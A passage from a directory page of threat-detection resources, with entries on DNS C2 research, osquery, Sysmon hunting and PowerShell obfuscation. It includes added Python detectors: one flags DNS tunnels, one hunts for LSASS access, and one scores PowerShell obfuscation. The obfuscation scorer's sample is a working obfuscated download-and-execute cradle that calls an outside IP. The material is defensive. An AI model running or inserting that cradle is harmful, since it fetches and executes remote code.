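Two of the four queries are flagged (ages 4 and 2 days); the allowlisted domain and the internal name that the store has never seen are not. Tune the age threshold to your own false-positive tolerance; legitimate SaaS and marketing domains are also registered fresh every day, so this belongs in scoring, not in blocking.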

Back to Name Jump

Letter O

This letter section contains 7 tools.

On Botnets that use DNS for Command and Control

  • Website: http://www.few.vu.nl/~herbertb/papers/feederbot_ec2nd11.pdf
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: On Botnets that use DNS for Command and Control is a research paper (Dietrich et al., EC2ND 2011) analysing Feederbot, a botnet that carried its command-and-control channel over DNS, and discussing how DNS-based C2 can be detected from the query patterns it produces rather than from payload signatures. The source list carries no summary beyond the title.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Research Papers.
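A DNS C2 channel has to encode data into query names and pull responses back in answer records, which leaves a measurable trace: many distinct high-entropy subdomains under one zone and an unusual share of TXT queries. The following is an added example written for this page, not code or data from the paper; the thresholds and the query log are constructed assumptions, and the heuristics are the generic ones for DNS tunnelling rather than anything specific to Feederbot.

```python
# Added example for this page (not code from the paper): heuristics for
# spotting a DNS-tunnelled C2 channel in query logs. Thresholds and the
# log lines are constructed assumptions.
import math
from collections import defaultdict

# Constructed query log: "<client_ip> <qname> <qtype>". The first client is
# talking to a tunnel through fresh high-entropy subdomains of one zone via TXT.
DNS_LOG = """\
10.0.0.7 a1b2c3d4e5f6a7b8c9d0.tunnel-c2.net TXT
10.0.0.7 f0e1d2c3b4a5968778695a4b.tunnel-c2.net TXT
10.0.0.7 9a8b7c6d5e4f3a2b1c0d9e8f7a6b.tunnel-c2.net TXT
10.0.0.7 11223344aabbccddeeff0011.tunnel-c2.net TXT
10.0.0.7 deadbeefcafef00d1234abcd.tunnel-c2.net TXT
10.0.0.7 7f3e9a1c5b8d2e6f4a0c9b7d.tunnel-c2.net TXT
10.0.0.9 www.example.com A
10.0.0.9 mail.example.com A
10.0.0.9 www.example.com A
10.0.0.9 cdn.example.com A
"""


def shannon_entropy(text):
    """Bits per character; encoded hex/base32 labels score well above words."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname):
    # Last two labels; a real deployment should use the Public Suffix List
    # so that "x.co.uk" is not split as "co.uk".
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def dns_c2_candidates(log_text, min_unique=5, min_entropy=3.0, min_txt_share=0.5):
    """Per registered zone: number of distinct subdomains, their mean label
    entropy and the share of TXT queries. A zone high on all three looks like
    a tunnel: each query carries fresh encoded data upstream, and TXT answers
    carry the downstream channel."""
    stats = defaultdict(lambda: {"subs": set(), "txt": 0, "total": 0, "clients": set()})
    for line in log_text.splitlines():
        client, qname, qtype = line.split()
        zone = registered_domain(qname)
        sub = qname[: -len(zone)].rstrip(".")
        s = stats[zone]
        s["total"] += 1
        s["clients"].add(client)
        if qtype == "TXT":
            s["txt"] += 1
        if sub:
            s["subs"].add(sub)

    findings = []
    for zone, s in stats.items():
        subs = s["subs"]
        mean_entropy = (sum(shannon_entropy(x.replace(".", "")) for x in subs) / len(subs)) if subs else 0.0
        txt_share = s["txt"] / s["total"]
        if len(subs) >= min_unique and mean_entropy >= min_entropy and txt_share >= min_txt_share:
            findings.append({"zone": zone, "unique_subdomains": len(subs),
                             "mean_entropy": round(mean_entropy, 2),
                             "txt_share": round(txt_share, 2),
                             "clients": sorted(s["clients"])})
    return findings


if __name__ == "__main__":
    for f in dns_c2_candidates(DNS_LOG):
        print(f)
```

Only tunnel-c2.net is flagged. CDNs and some security products also generate many distinct, random-looking subdomains, so in practice the zone-level baseline (how many unique subdomains this zone normally sees across the estate) matters more than any fixed threshold; the counters here are the inputs to that baseline.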

Back to Name Jump

On TTPs

  • Website: http://ryanstillions.blogspot.com.au/2014/04/on-ttps.html
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: On TTPs is Ryan Stillions' blog post introducing the Detection Maturity Level (DML) model, a scale describing how deeply a detection captures adversary behaviour, from atomic indicators (hashes, IP addresses) through host and network artifacts, tools and TTPs up to the adversary's strategy and goals; it argues that detections keyed to TTPs survive infrastructure changes that indicator-based detections do not. The source list carries no summary beyond the title.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

Open Cybersecurity Schema Framework (OCSF)

  • Website: https://github.com/ocsf/ocsf-schema
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Open Cybersecurity Schema Framework (OCSF) is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A framework for creating schemas that also delivers a cybersecurity event schema built with the framework.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Frameworks.

Back to Name Jump

osquery Across the Enterprise

  • Website: https://medium.com/@palantir/osquery-across-the-enterprise-3c3c9d13ec55
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: osquery Across the Enterprise is Palantir's write-up of deploying and operating osquery across a large fleet, including the configuration and query-pack management problems that appear at scale. The source list carries no summary beyond the title.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Osquery.

Back to Name Jump

osquery for Security — Part 1

  • Website: https://medium.com/@clong/osquery-for-security-b66fffdf2daf
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: osquery for Security — Part 1 is the first part of Chris Long's introduction to using osquery for security: what the tool is, how to query host state as SQL tables, and how to schedule queries for continuous monitoring. The source list carries no summary beyond the title.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Osquery.

Back to Name Jump

osquery for Security — Part 2

  • Website: https://medium.com/@clong/osquery-for-security-part-2-2e03de4d3721
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: osquery for Security — Part 2 is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Advanced osquery functionality, File integrity monitoring, process auditing, and more.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Osquery.

Back to Name Jump

OSSEM

  • Website: https://github.com/hunters-forge/OSSEM
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: OSSEM is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: (Open Source Security Events Metadata) - A community-led project that focuses on the documentation and standardization of security event logs from diverse data sources and operating systems.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Frameworks.

Back to Name Jump

Letter P

This letter section contains 5 tools.

Part 1 (CI/CD Detection Engineering: Splunk's Security Content)

  • Website: https://www.splunk.com/en_us/blog/security/ci-cd-detection-engineering-splunk-security-content-part-1.html
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Part 1 (CI/CD Detection Engineering: Splunk's Security Content) is the first post of a multipart Splunk series describing how detection as code can be deployed in a Splunk environment: detection content kept in version control, tested and released through a CI/CD pipeline rather than edited by hand in the SIEM.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

Part I (Event ID 7)

  • Website: https://cyberwardog.blogspot.com.au/2017/03/chronicles-of-threat-hunter-hunting-for.html
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Part I (Event ID 7) is the first post of Roberto Rodriguez's (Cyberwardog) "Chronicles of a Threat Hunter" series, hunting with Sysmon Event ID 7 (Image Loaded): which DLLs a process loads, and which combinations of loaded modules are unusual for that process. The source list carries no summary beyond the title.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows > Sysmon.

Back to Name Jump

Part II (Event ID 10)

  • Website: https://cyberwardog.blogspot.com.au/2017/03/chronicles-of-threat-hunter-hunting-for_22.html
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Part II (Event ID 10) is the second post of the same "Chronicles of a Threat Hunter" series, hunting with Sysmon Event ID 10 (ProcessAccess): which process opened a handle to which other process and with what GrantedAccess, the event that records reads of LSASS memory. The source list carries no summary beyond the title.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows > Sysmon.
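The Hunting with Sysmon entry, the Mordor entry and these two Sysmon posts all come down to the same exercise: reading Sysmon events and asking which process loaded what, and who touched LSASS. The following is an added example written for this page, not code from any of the linked posts or from the Mordor project. The events are constructed in the flattened one-object-per-line JSON form that Mordor datasets use (an assumption about the format), and the DLL watchlist, the minimum-hit count, the GrantedAccess check and the allowlist are all assumptions of the example rather than anything the posts prescribe.

```python
# Added example: two Sysmon hunts over Mordor-style JSON-lines events,
# Event ID 7 (Image Loaded) and Event ID 10 (ProcessAccess). Written for this
# page, not taken from the linked posts; DLL watchlist, GrantedAccess check,
# allowlist and the sample events are constructed assumptions.
import json

# Constructed Sysmon events, one JSON object per line. Paths are made up.
SAMPLE_JSONL = r"""
{"EventID": 7, "Hostname": "WS01", "Image": "C:\\Users\\bob\\AppData\\Local\\Temp\\svch0st.exe", "ImageLoaded": "C:\\Windows\\System32\\samlib.dll"}
{"EventID": 7, "Hostname": "WS01", "Image": "C:\\Users\\bob\\AppData\\Local\\Temp\\svch0st.exe", "ImageLoaded": "C:\\Windows\\System32\\vaultcli.dll"}
{"EventID": 7, "Hostname": "WS01", "Image": "C:\\Users\\bob\\AppData\\Local\\Temp\\svch0st.exe", "ImageLoaded": "C:\\Windows\\System32\\cryptdll.dll"}
{"EventID": 7, "Hostname": "WS01", "Image": "C:\\Windows\\System32\\lsass.exe", "ImageLoaded": "C:\\Windows\\System32\\samlib.dll"}
{"EventID": 7, "Hostname": "WS02", "Image": "C:\\Program Files\\Vendor\\app.exe", "ImageLoaded": "C:\\Windows\\System32\\cryptdll.dll"}
{"EventID": 10, "Hostname": "WS01", "SourceImage": "C:\\Users\\bob\\AppData\\Local\\Temp\\svch0st.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"}
{"EventID": 10, "Hostname": "WS02", "SourceImage": "C:\\Program Files\\EDR\\sensor.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF"}
{"EventID": 10, "Hostname": "WS02", "SourceImage": "C:\\Windows\\System32\\taskmgr.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000"}
{"EventID": 1, "Hostname": "WS01", "Image": "C:\\Windows\\System32\\cmd.exe"}
"""

# Assumption: DLLs that credential-dumping tooling tends to load together.
CRED_DLL_WATCHLIST = {"samlib.dll", "vaultcli.dll", "cryptdll.dll"}
MIN_WATCHLIST_HITS = 2
PROCESS_VM_READ = 0x0010          # Win32 access right: read another process's memory
# Assumption: images allowed to open LSASS with VM_READ on this estate (EDR sensor).
LSASS_ACCESS_ALLOWLIST = {"c:\\program files\\edr\\sensor.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def load_events(jsonl):
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def hunt_image_loads(events):
    """Event ID 7: per (host, process), collect the distinct watchlist DLLs it
    loaded. A process loading several of them together is worth a look;
    lsass.exe itself is expected to load them and is excluded."""
    seen = {}
    for e in events:
        if e.get("EventID") != 7 or basename(e["Image"]) == "lsass.exe":
            continue
        dll = basename(e["ImageLoaded"])
        if dll in CRED_DLL_WATCHLIST:
            seen.setdefault((e["Hostname"], e["Image"]), set()).add(dll)
    return [{"hunt": "image_load_cluster", "host": host, "process": proc, "dlls": sorted(dlls)}
            for (host, proc), dlls in seen.items() if len(dlls) >= MIN_WATCHLIST_HITS]


def hunt_lsass_access(events):
    """Event ID 10: any non-allowlisted process opening lsass.exe with VM_READ.
    Checking the access bit rather than exact values like 0x1010 also catches
    broader masks such as 0x1FFFFF (all access)."""
    findings = []
    for e in events:
        if e.get("EventID") != 10 or basename(e["TargetImage"]) != "lsass.exe":
            continue
        granted = int(e["GrantedAccess"], 16)
        if granted & PROCESS_VM_READ and e["SourceImage"].lower() not in LSASS_ACCESS_ALLOWLIST:
            findings.append({"hunt": "lsass_access", "host": e["Hostname"],
                             "process": e["SourceImage"], "granted_access": hex(granted)})
    return findings


def run_hunts(jsonl=SAMPLE_JSONL):
    events = load_events(jsonl)
    return hunt_image_loads(events) + hunt_lsass_access(events)


if __name__ == "__main__":
    for finding in run_hunts():
        print(finding)
```

On the sample data the renamed binary in a Temp directory is caught twice: once for loading three watchlist DLLs, once for opening LSASS with VM_READ. The EDR sensor's full-access handle is suppressed by the allowlist, and Task Manager's 0x1000 (query limited information) does not include VM_READ. Both hunts only work if the Sysmon configuration actually records Event ID 7 and Event ID 10 for the relevant images; many configurations filter them heavily for volume reasons, so verify the telemetry exists before trusting a silent hunt.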

Back to Name Jump

Proactive Malicious Domain Search

  • Website: https://isc.sans.edu/forums/diary/Proactive+Malicious+Domain+Search/23065/
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Proactive Malicious Domain Search is a SANS Internet Storm Center diary on proactively searching for newly registered or look-alike domains that could be used against your organisation, so that they can be watched or blocked before they show up in alerts. The source list carries no summary beyond the title.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > DNS.

Back to Name Jump

ProcMon for Linux

  • Website: https://github.com/Sysinternals/ProcMon-for-Linux
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: ProcMon for Linux is Microsoft Sysinternals' Linux port of Process Monitor: it traces the system call activity of processes on a Linux host and presents it in a filterable terminal interface. The source list gives no summary beyond the link. It is an interactive troubleshooting tool rather than a continuous telemetry agent, so for fleet-wide collection pair it with auditd or eBPF-based tooling.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

Back to Name Jump

Letter R

This letter section contains 4 tools.

Random Words on Entropy and DNS

  • Website: https://www.splunk.com/blog/2015/10/01/random-words-on-entropy-and-dns.html
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Random Words on Entropy and DNS is a 2015 Splunk blog post on applying Shannon entropy to DNS query names in Splunk to surface random-looking domains such as those produced by domain generation algorithms. The source list gives no summary beyond the title. It is a reference, not software.

Operational value: Entropy is a cheap first-pass feature for DNS logs: it needs no feed of known-bad domains and it generalises across DGA families, at the cost of false positives on legitimate high-entropy names (CDN hostnames, cloud storage buckets, tracking subdomains) and on long names built from several dictionary words.

Typical deployment pattern: Nothing is installed. Compute the score over your existing DNS telemetry, establish a per-environment baseline, allowlist known high-entropy infrastructure, and only then route hits to analysts.

Selection considerations: The SPL in a 2015 post may need updating for current Splunk versions, and the entropy threshold must be tuned on your own data rather than copied. Related source context: Awesome Threat Detection and Hunting > Resources > DNS.

Back to Name Jump

RDP Fingerprinting - Profiling RDP Clients with JA3 and RDFP

  • Website: https://medium.com/@0x4d31/rdp-client-fingerprinting-9e7ac219f7f4
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: RDP Fingerprinting - Profiling RDP Clients with JA3 and RDFP is a blog post on identifying RDP client software from the wire: JA3 fingerprints the TLS ClientHello an RDP client sends, and RDFP, described in the post, fingerprints fields of the RDP protocol exchange itself. The source list gives no summary beyond the title. It is a reference, not software.

Operational value: Client fingerprints let you distinguish the corporate RDP client from scanners, brute-forcers and attacker tooling on the same port, which is a useful pivot when credentials are valid and authentication logs alone look normal.

Typical deployment pattern: Nothing is installed by the post itself. You need a sensor that already extracts JA3 (Zeek with the JA3 package, Suricata, or similar) at the RDP ingress points, a baseline of expected fingerprints, and a rule for everything outside it.

Selection considerations: Fingerprints drift with client updates, so the baseline needs an owner and a refresh cadence; confirm the link still resolves. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

Back to Name Jump

Revoke-Obfuscation

  • Website: https://github.com/danielbohannon/Revoke-Obfuscation
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Revoke-Obfuscation is a PowerShell obfuscation detection framework. It extracts statistical features from PowerShell script text (character distributions, escape and casting idioms, abstract syntax tree shape) and scores scripts as obfuscated or not, and it can take its input from script block logs as well as from files on disk. Source summaries describe it as: PowerShell Obfuscation Detection Framework.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

Back to Name Jump
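A simplified feature-scoring pass in the style of Revoke-Obfuscation's character-level approach, added as an example and not the project's code or its trained model: it counts escape, casting, join and string-splitting idioms plus the share of punctuation, then scores two constructed scripts, one plain and one obfuscated. The weights and the threshold are assumptions to be tuned on your own script block log corpus.

```python
"""Character-level obfuscation scoring for PowerShell script text.

Added example in the spirit of Revoke-Obfuscation's feature approach, not its
code or its trained model: a handful of hand-picked features with assumed
weights, run over two constructed scripts. Real input would come from script
block logging (Event ID 4104).
"""
import re

PLAIN_SAMPLE = r"""
Get-ChildItem -Path C:\Windows\Temp -Filter *.log |
    Where-Object { $_.Length -gt 1MB } |
    ForEach-Object { Write-Output $_.FullName }
"""

OBFUSCATED_SAMPLE = r"""
$n = ([char]73,[char]69,[char]88 -join '');
$a = ('Ne'+'w-Ob'+'je'+'ct'); $b = ('Net.We'+'bCl'+'ient');
I`e`X ((&$a $b).('Down'+'loadStr'+'ing').Invoke(('ht'+'tp://198.51.100.7/'+'x.ps1')))
"""

# Assumed weights: escape and cast tricks weigh more than plain string splitting.
WEIGHTS = {"backticks": 3.0, "char_casts": 2.0, "join_ops": 2.0, "concat_ops": 1.0}
SPECIAL_RATIO_WEIGHT = 20.0
THRESHOLD = 10.0  # assumed; calibrate on known-good scripts from your estate


def extract_features(script: str) -> dict:
    """Raw counts of obfuscation idioms plus the share of punctuation characters."""
    length = max(len(script), 1)
    return {
        "backticks": script.count("`"),                                   # I`e`X
        "char_casts": len(re.findall(r"\[char\]", script, re.I)),         # [char]73
        "join_ops": len(re.findall(r"-join\b", script, re.I)),            # ... -join ''
        "concat_ops": len(re.findall(r"'\s*\+\s*'", script)),             # 'Ne'+'w-Ob'
        "special_ratio": sum(1 for c in script if not c.isalnum() and not c.isspace()) / length,
        "length": len(script),
    }


def obfuscation_score(script: str) -> float:
    """Counts are normalised per 100 characters so long scripts are not penalised."""
    f = extract_features(script)
    per_100 = 100.0 / max(f["length"], 1)
    score = sum(WEIGHTS[k] * f[k] * per_100 for k in WEIGHTS)
    return round(score + SPECIAL_RATIO_WEIGHT * f["special_ratio"], 2)


def is_obfuscated(script: str, threshold: float = THRESHOLD) -> bool:
    return obfuscation_score(script) >= threshold


if __name__ == "__main__":
    for name, text in (("plain", PLAIN_SAMPLE), ("obfuscated", OBFUSCATED_SAMPLE)):
        print(name, obfuscation_score(text), is_obfuscated(text))
```

Hand-picked idiom counts are easy to evade (an attacker simply avoids the listed tokens); the point of Revoke-Obfuscation's thousands of character-frequency features and a trained classifier is that no single idiom carries the verdict.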

Risky Business

  • Website: https://risky.biz
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Risky Business is an information security news podcast hosted by Patrick Gray. The source list files it under Podcasts; it is not software, and the "Open Source" model label reflects only that it is freely available.

Operational value: It is a way for a detection team to keep current on campaigns, tooling and vendor incidents that should trigger a review of existing coverage; it feeds awareness, not a pipeline.

Typical deployment pattern: Nothing to deploy. Some teams route notable episodes into a weekly threat-intel review so that the coverage questions they raise are tracked to an owner.

Selection considerations: The usual open-source criteria (maintainer activity, release cadence) do not apply; what matters is whether its coverage overlaps the threats you prioritise. Related source context: Awesome Threat Detection and Hunting > Podcasts.

Back to Name Jump

Letter S

This letter section contains 10 tools.

SecRepo.com

  • Website: https://www.secrepo.com
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: SecRepo.com is a curated index of publicly available security-related datasets (network captures, system and application logs, threat data and similar) collected for research and for testing detections. Source summaries describe it as: Samples of security related data.

Operational value: Realistic sample data lets a team test parsers and detection rules, and train analysts, before the corresponding telemetry exists in production.

Typical deployment pattern: Nothing is installed. Pick datasets that match the log sources you ingest, load them into a lab instance of your SIEM, and use them as regression fixtures for rules.

Selection considerations: SecRepo indexes third-party data rather than shipping software, so check each dataset's licence, age and format before building tests on it, and keep a local copy since upstream links rot. Related source context: Awesome Threat Detection and Hunting > Dataset.

Back to Name Jump

Signal the ATT&CK: Part 1

  • Website: https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/signal-att-and-ck-part-1.html
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Signal the ATT&CK: Part 1 is a PwC write-up on building a real-time threat detection capability with Tanium that targets documented adversary techniques from MITRE ATT&CK. Tanium itself is commercial; what is open here is the article and its approach.

Operational value: A worked example of organising detection content around ATT&CK techniques instead of individual indicators, which transfers to any endpoint platform with comparable query capability.

Typical deployment pattern: Nothing is installed by the article. Map the techniques it covers to your own endpoint telemetry and use the mapping to find coverage gaps.

Selection considerations: Judge the content on how far its Tanium-specific detail translates to your stack, and confirm the link still resolves. Related source context: Awesome Threat Detection and Hunting > Threat Simulation Resources.

Back to Name Jump

Slides

  • Website: https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492182404.pdf
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Slides is a presentation deck hosted in the SANS Cyber Security Summit archive. The source list gives no summary or talk title beyond the link, so open the PDF to identify the talk before citing it. It is a reference, not software.

Operational value: Summit decks are condensed practitioner experience; their value lies in the specific techniques or telemetry sources they point to, which then need validating in your own environment.

Typical deployment pattern: Nothing is installed. Extract the concrete detection ideas from the deck and track them as candidate rules or hunts.

Selection considerations: Check the deck's date against the current state of the tools it discusses, and confirm the link still resolves. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

Splunk Boss of the SOC

  • Website: https://bots.splunk.com/
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Splunk Boss of the SOC (BOTS) is a blue-team capture-the-flag run by Splunk. Source summaries describe it as: Hands-on workshops and challenges to practice threat hunting using the BOTS and other datasets. Datasets from past competitions have been released publicly, so the exercises can be replayed in your own Splunk instance.

Operational value: Analysts practise end-to-end investigations (triage, pivoting, evidence collection) on realistic multi-source data, which improves consistency when the same steps are split across teams in production.

Typical deployment pattern: Load a BOTS dataset into a lab Splunk instance with the required add-ons, run the questions as a team exercise, and record which investigative steps had no equivalent in your own environment.

Selection considerations: BOTS is a training lab rather than production tooling; match the dataset versions to the Splunk version and add-ons you run, and budget the storage they need. Related source context: Awesome Threat Detection and Hunting > Labs.

Back to Name Jump

Splunk Detections

  • Website: https://research.splunk.com/detections/
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Splunk Detections is the browsable catalog at research.splunk.com of detections maintained by the Splunk Threat Research Team, with each detection's SPL search, ATT&CK mapping and required data sources. It is the rendered view of the Splunk Security Content repository listed separately below; the source list gives no summary of its own.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Detection Rules.

Back to Name Jump

Splunk Security Content

  • Website: https://github.com/splunk/security_content
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Splunk Security Content is the GitHub repository behind the Splunk Threat Research Team's detections: YAML-defined detections with SPL searches, ATT&CK tags and test data, packaged as the Enterprise Security Content Update app. Source summaries describe it as: Splunk-curated detection content that can easily be used across many SIEMs (see Uncoder Rule Converter).

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

Back to Name Jump

Splunkmon — Taking Sysmon to the Next Level

  • Website: https://www.crypsisgroup.com/wp-content/uploads/2017/07/CG_WhitePaper_Splunkmon_1216-1.pdf
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Splunkmon — Taking Sysmon to the Next Level is a Crypsis Group white paper on collecting Sysmon telemetry into Splunk and building searches over it. The source list gives no summary beyond the title. It is a reference, not software.

Operational value: A practical guide to the field-level content of Sysmon events and how to query it, which is the groundwork for most Windows endpoint detections built on Sysmon.

Typical deployment pattern: Nothing is installed by the paper. It assumes Sysmon is deployed with a tuned configuration and forwarded to Splunk; the searches it shows are then adapted to your index and sourcetype names.

Selection considerations: The paper dates from 2016 or 2017 (per the URL), so check its event IDs and field names against the current Sysmon schema, and confirm the link still resolves. Related source context: Awesome Threat Detection and Hunting > Resources > Windows > Sysmon.

Back to Name Jump

Suspicious Domains Tracking Dashboard

  • Website: https://isc.sans.edu/forums/diary/Suspicious+Domains+Tracking+Dashboard/23046/
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

